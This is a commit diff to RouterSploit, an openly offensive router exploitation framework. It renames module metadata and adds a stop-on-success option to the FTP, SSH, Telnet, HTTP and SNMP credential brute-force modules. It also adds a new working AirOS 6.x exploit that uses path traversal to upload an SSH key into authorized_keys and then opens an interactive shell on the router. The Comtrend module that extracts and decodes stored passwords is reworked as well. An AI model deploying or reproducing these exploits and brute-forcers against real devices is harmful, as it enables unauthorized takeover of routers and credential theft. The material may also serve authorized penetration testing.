Skip to content

R
routersploit
Commit e4bf2568 by Milad Doorbash
Options

Merge with upstream/master

parents 7db65a6b 7318a775
Showing with 340 additions and 85 deletions
README.md
......@@ -14,11 +14,36 @@ It consists of various modules that aids penetration testing operations:
# Installation
## Requirements
* gnureadline
* requests
* paramiko
* beautifulsoup4
* pysnmp
## Installation on Kali
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py
## Installation on Ubuntu
sudo apt-get install python-dev python-pip libncurses5-dev git
git clone https://github.com/reverse-shell/routersploit
cd routersploit
pip install -r requirements.txt
./rsf.py
## Installation on OSX
git clone https://github.com/reverse-shell/routersploit
cd routersploit
sudo easy_install pip
sudo pip install -r requirements.txt
./rsf.py
# Update
Update RouterSploit Framework often. Project is under heavy development and new modules are shipped almost everyday.
......@@ -101,7 +126,7 @@ Display information about exploit:
Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.
Targets:
Devices:
- D-Link DIR 300
- D-Link DIR 600
......
routersploit/interpreter.py
......@@ -205,11 +205,11 @@ class RoutersploitInterpreter(BaseInterpreter):
self.modules.append(module_path.split('.', 2).pop())
def __parse_prompt(self):
raw_prompt_default_template = "\033[4m{host}\033[0m > "
raw_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 > "
raw_prompt_template = os.getenv("RSF_RAW_PROMPT", raw_prompt_default_template).replace('\\033', '\033')
self.raw_prompt_template = raw_prompt_template if '{host}' in raw_prompt_template else raw_prompt_default_template
module_prompt_default_template = "\033[4m{host}\033[0m (\033[91m{module}\033[0m) > "
module_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 (\001\033[91m\002{module}\001\033[0m\002) > "
module_prompt_template = os.getenv("RSF_MODULE_PROMPT", module_prompt_default_template).replace('\\033', '\033')
self.module_prompt_template = module_prompt_template if all(map(lambda x: x in module_prompt_template, ['{host}', "{module}"])) else module_prompt_default_template
......@@ -331,12 +331,12 @@ class RoutersploitInterpreter(BaseInterpreter):
@utils.module_required
def command_show(self, *args, **kwargs):
info, options = 'info', 'options'
info, options, devices = 'info', 'options', 'devices'
sub_command = args[0]
if sub_command == info:
utils.pprint_dict_in_order(
self.module_metadata,
("name", "description", "targets", "authors", "references"),
("name", "description", "devices", "authors", "references"),
)
utils.print_info()
elif sub_command == options:
......@@ -352,12 +352,27 @@ class RoutersploitInterpreter(BaseInterpreter):
utils.print_table(headers, *self.get_opts(*module_opts))
utils.print_info()
elif sub_command == devices:
if devices in self.current_module._Exploit__info__.keys():
devices = self.current_module._Exploit__info__['devices']
print("\nTarget devices:")
i = 0
for device in devices:
if isinstance(device, dict):
print(" {} - {}".format(i, device['name']))
else:
print(" {} - {}".format(i, device))
i += 1
print()
else:
print("\nTarget devices are not defined")
else:
print("Unknown command 'show {}'. You want to 'show {}' or 'show {}'?".format(sub_command, info, options))
@utils.stop_after(2)
def complete_show(self, text, *args, **kwargs):
sub_commands = ['info', 'options']
sub_commands = ['info', 'options', 'devices']
if text:
return filter(lambda command: command.startswith(text), sub_commands)
else:
......
routersploit/modules/creds/ftp_bruteforce.py
......@@ -23,7 +23,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'FTP Bruteforce',
'author': [
'authors': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
......@@ -35,6 +35,7 @@ class Exploit(exploits.Exploit):
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
......@@ -107,7 +108,9 @@ class Exploit(exploits.Exploit):
try:
ftp.login(user, password)
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
except:
......
routersploit/modules/creds/ftp_default.py
......@@ -22,7 +22,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'FTP Default Creds',
'author': [
'authors': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
......@@ -33,6 +33,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Numbers of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass pair or file with default credentials (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
......@@ -99,7 +100,9 @@ class Exploit(exploits.Exploit):
try:
ftp.login(user, password)
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
except:
......
routersploit/modules/creds/http_basic_bruteforce.py
......@@ -23,7 +23,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'HTTP Basic Bruteforce',
'author': [
'authors': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
......@@ -36,6 +36,7 @@ class Exploit(exploits.Exploit):
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
path = exploits.Option('/', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
......@@ -92,7 +93,9 @@ class Exploit(exploits.Exploit):
response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
......
routersploit/modules/creds/http_basic_default.py
......@@ -22,7 +22,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'HTTP Basic Default Creds',
'author': [
'authors': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
......@@ -33,6 +33,7 @@ class Exploit(exploits.Exploit):
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
path = exploits.Option('/', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
......@@ -85,7 +86,9 @@ class Exploit(exploits.Exploit):
response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
......
routersploit/modules/creds/http_form_bruteforce.py
......@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'HTTP Form Bruteforce',
'author': [
'authors': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
......@@ -34,10 +34,11 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
form = exploits.Option('auto', 'Post Data: auto or in form login={{LOGIN}}&password={{PASS}}&submit')
form = exploits.Option('auto', 'Post Data: auto or in form login={{USER}}&password={{PASS}}&submit')
path = exploits.Option('/login.php', 'URL Path')
form_path = exploits.Option('same', 'same as path or URL Form Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
data = ""
......@@ -172,7 +173,9 @@ class Exploit(exploits.Exploit):
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
......
routersploit/modules/creds/http_form_default.py
......@@ -23,7 +23,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'HTTP Form Default Creds',
'author': [
'authors': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
......@@ -32,10 +32,11 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
form = exploits.Option('auto', 'Post Data: auto or in form login={{LOGIN}}&password={{PASS}}&submit')
form = exploits.Option('auto', 'Post Data: auto or in form login={{USER}}&password={{PASS}}&submit')
path = exploits.Option('/login.php', 'URL Path')
form_path = exploits.Option('same', 'same as path or URL Form Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
data = ""
......@@ -165,7 +166,9 @@ class Exploit(exploits.Exploit):
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
......
routersploit/modules/creds/snmp_bruteforce.py
import threading
import netsnmp
from pysnmp.entity.rfc3413.oneliner import cmdgen
from routersploit import (
exploits,
......@@ -21,7 +21,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'SNMP Bruteforce',
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
'authors': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
......@@ -29,7 +29,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
snmp = exploits.Option(wordlists.snmp, 'Community string or file with community strings (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid community string')
strings = []
def run(self):
......@@ -59,23 +59,27 @@ class Exploit(exploits.Exploit):
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
address = "{}:{}".format(self.target, self.port)
print_status(name, 'thread is starting...', verbose=module_verbosity)
cmdGen = cmdgen.CommandGenerator()
while running.is_set():
try:
string = data.next().strip()
bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0")
res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string)
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(string),
cmdgen.UdpTransportTarget((self.target, int(self.port))),
'1.3.6.1.2.1.1.1.0',
)
if res[0] is not None:
if errorIndication or errorStatus:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
except StopIteration:
break
......
routersploit/modules/creds/ssh_bruteforce.py
......@@ -23,7 +23,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'SSH Bruteforce',
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
'authors': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
......@@ -33,6 +33,7 @@ class Exploit(exploits.Exploit):
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
......@@ -95,10 +96,10 @@ class Exploit(exploits.Exploit):
ssh.close()
print_error("Target: {}:{} {}: {} Username: '{}' Password: '{}'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {} Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
print_status(name, 'thread is terminated.', verbose=module_verbosity)
routersploit/modules/creds/ssh_default.py
......@@ -22,7 +22,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'SSH Default Creds',
'author': [
'authors': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
......@@ -32,6 +32,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Numbers of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
......@@ -90,10 +91,10 @@ class Exploit(exploits.Exploit):
print_error("Target: {}:{} {}: {} Username: '{}' Password: '{}'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {} Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
print_status(name, 'process is terminated.', verbose=module_verbosity)
routersploit/modules/creds/telnet_bruteforce.py
......@@ -22,7 +22,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Telnet Bruteforce',
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
'authors': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
......@@ -32,6 +32,7 @@ class Exploit(exploits.Exploit):
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
......@@ -100,7 +101,9 @@ class Exploit(exploits.Exploit):
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
else:
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
tn.close()
......
routersploit/modules/creds/telnet_default.py
......@@ -21,7 +21,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Telnet Default Creds',
'author': [
'authors': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
......@@ -32,6 +32,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Numbers of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt')
credentials = []
......@@ -94,7 +95,9 @@ class Exploit(exploits.Exploit):
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
else:
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
if boolify(self.stop_on_success):
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
tn.close()
......
routersploit/modules/exploits/2wire/gateway_auth_bypass.py
......@@ -23,7 +23,7 @@ class Exploit(exploits.Exploit):
'references': [
'https://www.exploit-db.com/exploits/9459/',
],
'targets': [
'devices': [
'2Wire 2701HGV-W',
'2Wire 3800HGV-B',
'2Wire 3801HGV',
......
routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
......@@ -27,7 +27,7 @@ class Exploit(exploits.Exploit):
'references': [
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
],
'targets': [
'devices': [
'Asmax AR 1004g',
],
}
......
routersploit/modules/exploits/asmax/ar_804_gu_rce.py
......@@ -28,7 +28,7 @@ class Exploit(exploits.Exploit):
'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise',
'https://www.exploit-db.com/exploits/8846/',
],
'targets': [
'devices': [
'Asmax AR 804 gu',
],
}
......
routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
......@@ -28,7 +28,7 @@ class Exploit(exploits.Exploit):
'references': [
'https://github.com/jduck/asus-cmd',
],
'targets': [
'devices': [
'ASUS RT-N66U',
'ASUS RT-AC87U',
'ASUS RT-N56U',
......
routersploit/modules/exploits/asus/rt_n16_password_disclosure.py
......@@ -26,7 +26,7 @@ class Exploit(exploits.Exploit):
'references': [
'https://sintonen.fi/advisories/asus-router-auth-bypass.txt'
],
'targets': [
'devices': [
'ASUS RT-N10U, firmware 3.0.0.4.374_168',
'ASUS RT-N56U, firmware 3.0.0.4.374_979',
'ASUS DSL-N55U, firmware 3.0.0.4.374_1397',
......
routersploit/modules/exploits/belkin/g_n150_password_disclosure.py
......@@ -28,7 +28,7 @@ class Exploit(exploits.Exploit):
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765',
'https://www.exploit-db.com/exploits/17349/',
],
'targets': [
'devices': [
'Belkin G',
'Belkin N150',
],
......
routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
......@@ -27,7 +27,7 @@ class Exploit(exploits.Exploit):
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0403',
'https://www.exploit-db.com/exploits/4941/',
],
'targets': [
'devices': [
'Belkin G',
],
}
......
routersploit/modules/exploits/belkin/n150_path_traversal.py
......@@ -26,7 +26,7 @@ class Exploit(exploits.Exploit):
'http://www.belkin.com/us/support-article?articleNum=109400',
'http://www.kb.cert.org/vuls/id/774788',
],
'targets': [
'devices': [
'Belkin N150 1.00.07',
'Belkin N150 1.00.08',
'Belkin N150 1.00.09',
......
routersploit/modules/exploits/belkin/n750_rce.py
......@@ -27,7 +27,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/35184/',
'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/',
],
'targets': [
'devices': [
'Belkin N750',
]
}
......
routersploit/modules/exploits/cisco/ucs_manager_rce.py
......@@ -28,7 +28,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/39568/',
'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash',
],
'targets': [
'devices': [
'Cisco UCS Manager 2.1 (1b)',
],
}
......
routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
......@@ -27,10 +27,8 @@ class Exploit(exploits.Exploit):
'references': [
'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html'
],
'targets': [
'Comtrend CT 5361T (more likely CT 536X)\n' +
'Software Version: A111-312SSG-T02_R01\n' +
'Wireless Driver Version: 4.150.10.15.cpe2.2'
'devices': [
'Comtrend CT 5361T (more likely CT 536X)',
]
}
......@@ -38,26 +36,24 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
print_status("Requesting for {}".format(url))
response = http_request(method="GET", url=url)
if response is None:
return
creds = []
admin = re.findall("pwdAdmin = '(.+?)'", response.text)
if len(admin):
creds.append(('Admin', b64decode(admin[0])))
regexps = [("admin", "pwdAdmin = '(.+?)'"),
("support", "pwdSupport = '(.+?)'"),
("user", "pwdUser = '(.+?)'")]
support = re.findall("pwdSupport = '(.+?)'", response.text)
if len(support):
creds.append(('Support', b64decode(support[0])))
creds = []
for regexp in regexps:
res = re.findall(regexp[1], response.text)
user = re.findall("pwdUser = '(.+?)'", response.text)
if len(user):
creds.append(('User', b64decode(user[0])))
if len(res):
creds.append((regexp[0], b64decode(res[0])))
if len(creds):
print_success("Credentials found!")
......@@ -66,6 +62,8 @@ class Exploit(exploits.Exploit):
print("NOTE: Admin is commonly implemented as root")
else:
print_error("Credentials could not be found")
else:
print_error("Device seems to be not vulnerable")
@mute
def check(self):
......@@ -75,7 +73,19 @@ class Exploit(exploits.Exploit):
if response is None:
return False # target is not vulnerable
if any(map(lambda x: x in response.text, ["pwdSupport", "pwdUser", "pwdAdmin"])):
return True # target vulnerable
regexps = ["pwdAdmin = '(.+?)'",
"pwdSupport = '(.+?)'",
"pwdUser = '(.+?)'"]
for regexp in regexps:
res = re.findall(regexp, response.text)
if len(res):
try:
b64decode(res[0]) # checking if data is base64 encoded
except:
return False # target is not vulnerable
else:
return False # target is not vulnerable
return True # target is vulnerable
routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py
......@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
'references': [
'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
],
'targets': [
'devices': [
'D-Link DIR-300',
'D-Link DIR-600',
'D-Link DIR-615 revD',
......
routersploit/modules/exploits/dlink/dir_300_600_615_info_disclosure.py
......@@ -26,7 +26,7 @@ class Exploit(exploits.Exploit):
'references': [
'http://seclists.org/bugtraq/2013/Dec/11'
],
'targets': [
'devices': [
'D-Link DIR-300 (all)',
'D-Link DIR-600 (all)',
'D-Link DIR-615 (fw 4.0)',
......
routersploit/modules/exploits/dlink/dir_300_600_rce.py
......@@ -27,7 +27,7 @@ class Exploit(exploits.Exploit):
'http://www.s3cur1ty.de/home-network-horror-days',
'http://www.s3cur1ty.de/m1adv2013-003',
],
'targets': [
'devices': [
'D-Link DIR 300',
'D-Link DIR 600',
]
......
routersploit/modules/exploits/dlink/dir_645_password_disclosure.py
......@@ -26,7 +26,7 @@ class Exploit(exploits.Exploit):
'references': [
'https://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt'
],
'targets': [
'devices': [
'D-Link DIR-645 (Versions < 1.03)',
]
}
......
routersploit/modules/exploits/dlink/dns_320l_327l_rce.py
......@@ -28,7 +28,7 @@ class Exploit(exploits.Exploit):
'references': [
'http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf',
],
'targets': [
'devices': [
'DNS-320L 1.03b04',
'DNS-327L, 1.02',
]
......
routersploit/modules/exploits/dlink/dsl_2750b_info_disclosure.py
......@@ -28,7 +28,7 @@ class Exploit(exploits.Exploit):
'references': [
'http://seclists.org/fulldisclosure/2015/May/129'
],
'targets': [
'devices': [
'D-Link DSL-2750B EU_1.01',
],
}
......
routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
......@@ -25,7 +25,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/39409/',
'http://ipositivesecurity.blogspot.com/2016/02/dlink-dvgn5402sp-multiple-vuln.html',
],
'targets': [
'devices': [
'D-Link DVG-N5402SP',
]
}
......
routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py
......@@ -27,7 +27,7 @@ class Exploit(exploits.Exploit):
'references': [
'https://www.exploit-db.com/exploits/39581/',
],
'targets': [
'devices': [
'D-Link DWR-932',
]
}
......
routersploit/modules/exploits/fortinet/fortigate_os_backdoor.py
......@@ -33,7 +33,7 @@ class Exploit(exploits.Exploit):
'http://www.s3cur1ty.de/home-network-horror-days',
'http://www.s3cur1ty.de/m1adv2013-003',
],
'targets': [
'devices': [
'FortiGate OS Version 4.x-5.0.7',
]
}
......
routersploit/modules/exploits/juniper/screenos_backdoor.py
......@@ -23,7 +23,7 @@ class Exploit(exploits.Exploit):
'references': [
'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor',
],
'targets': [
'devices': [
'Juniper ScreenOS 6.2.0r15 to 6.2.0r18',
'Juniper ScreenOS 6.3.0r12 to 6.3.0r20',
]
......
routersploit/modules/exploits/linksys/1500_2500_rce.py
......@@ -27,7 +27,7 @@ class Exploit(exploits.Exploit):
'references': [
'https://www.exploit-db.com/exploits/24475/',
],
'targets': [
'devices': [
'Linksys E1500/E2500',
]
}
......
routersploit/modules/exploits/linksys/wap54gv3_rce.py
......@@ -27,7 +27,7 @@ class Exploit(exploits.Exploit):
'references': [
'http://seclists.org/bugtraq/2010/Jun/93',
],
'targets': [
'devices': [
'Linksys WAP54Gv3',
]
}
......
routersploit/modules/exploits/netgear/multi_rce.py
......@@ -28,7 +28,7 @@ class Exploit(exploits.Exploit):
'http://firmware.re/vulns/acsa-2015-001.php',
'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf',
],
'targets': [
'devices': [
'Netgear WG102',
'Netgear WG103',
'Netgear WN604',
......
routersploit/modules/exploits/netgear/n300_auth_bypass.py
......@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt',
'http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html',
],
'targets': [
'devices': [
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
......
routersploit/modules/exploits/netgear/prosafe_rce.py
......@@ -28,7 +28,7 @@ class Exploit(exploits.Exploit):
'http://firmware.re/vulns/acsa-2015-002.php',
'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf',
],
'targets': [
'devices': [
'Netgear ProSafe WC9500',
'Netgear ProSafe WC7600',
'Netgear ProSafe WC7520',
......
routersploit/modules/exploits/technicolor/tc7200_password_disclosure.py
......@@ -23,7 +23,7 @@ class Exploit(exploits.Exploit):
'references': [
'https://www.exploit-db.com/exploits/31894/',
],
'targets': [
'devices': [
'Technicolor TC7200',
]
}
......
routersploit/modules/exploits/ubiquiti/airos_6_x.py 0 → 100644
import requests, tempfile, os.path
import paramiko, StringIO, termios, tty, sys, select, socket
from routersploit import (
exploits,
print_success,
print_error,
print_info,
random_text,
sanitize_url,
http_request,
mute,
)
class Exploit(exploits.Exploit):
'''
Exploit implementation for AirOS 6.x - Arbitrary File Upload.
If the target is vulnerable is possible to take full control of the router
'''
__info__ = {
'name': 'AirOS 6.x - Arbitrary File Upload',
'description': 'Exploit implementation for AirOS 6.x - Arbitrary File Upload. If the target is vulnerable is possible to take full control of the router',
'authors': [
'93c08539', #Vulnerability discovery
'Vinicius Henrique Marangoni' #routersploit module
],
'references': [
'https://hackerone.com/reports/73480',
'https://www.exploit-db.com/exploits/39701/'
],
'devices': [
'AirOS 6.x'
]
}
target = exploits.Option('', 'Target address e.g. https://192.168.1.1') #Target address
port = exploits.Option(443, 'Target port e.g. 443') #Default port
#Disable certificate verification warnings
requests.packages.urllib3.disable_warnings()
def run(self):
if(self.check()):
print_success('Target is vulnerable')
print_success('Trying to exploit by uploading SSH public key')
key = paramiko.RSAKey.generate(1024)
public_key = key.get_base64()
private_key = StringIO.StringIO()
key.write_private_key(private_key)
tmp_file_pubkey = tempfile.TemporaryFile()
tmp_file_pubkey.write('ssh-rsa ' + public_key)
tmp_file_pubkey.seek(0)
upload_params = {'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {'Expect': ''})}
upload_url = sanitize_url('{0}:{1}/login.cgi' .format(self.target, self.port))
response = http_request(url=upload_url, method='POST', files=upload_params)
if(response is None):
print_error('Something was wrong while uploading the SSH Public Key')
return
print_success('Appareantly the exploit worked fine')
print_success('Trying to invoke a interactive SSH Shell')
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
pseudo_privkey_file = StringIO.StringIO(private_key.getvalue())
pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file)
pseudo_privkey_file.close()
ip_target = self.target.replace('https://', '')
ip_target = ip_target.replace('http://', '')
ip_target = ip_target.replace('/', '')
client.connect(ip_target, 22, username='ubnt', pkey=pkey)
# invoking interactive shell
chan = client.invoke_shell()
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while(True):
r, w, e = select.select([chan, sys.stdin], [], [])
if(chan in r):
try:
x = unicode(chan.recv(1024))
if(len(x) == 0):
sys.stdout.write('\r\nExiting...\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if(sys.stdin in r):
x = sys.stdin.read(1)
if(len(x) == 0):
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
private_key.close()
else:
print_error('Target is not vulnerable')
@mute
def check(self):
base_url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
upload_url = base_url + 'login.cgi'
response = http_request(url=upload_url, method='GET')
if(response is None):
return False #Target not vulnerable
rand_str = random_text(length=16)
tmp_payload = tempfile.TemporaryFile()
tmp_payload.write('vulnerable' + rand_str)
tmp_payload.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}
response = http_request(url=upload_url, method='POST', files=upload_params)
tmp_payload.close()
if(response is None):
return False #Target not vulnerable
#Response to verify if the upload was done correctly
airview_url = base_url + 'airview.uavr'
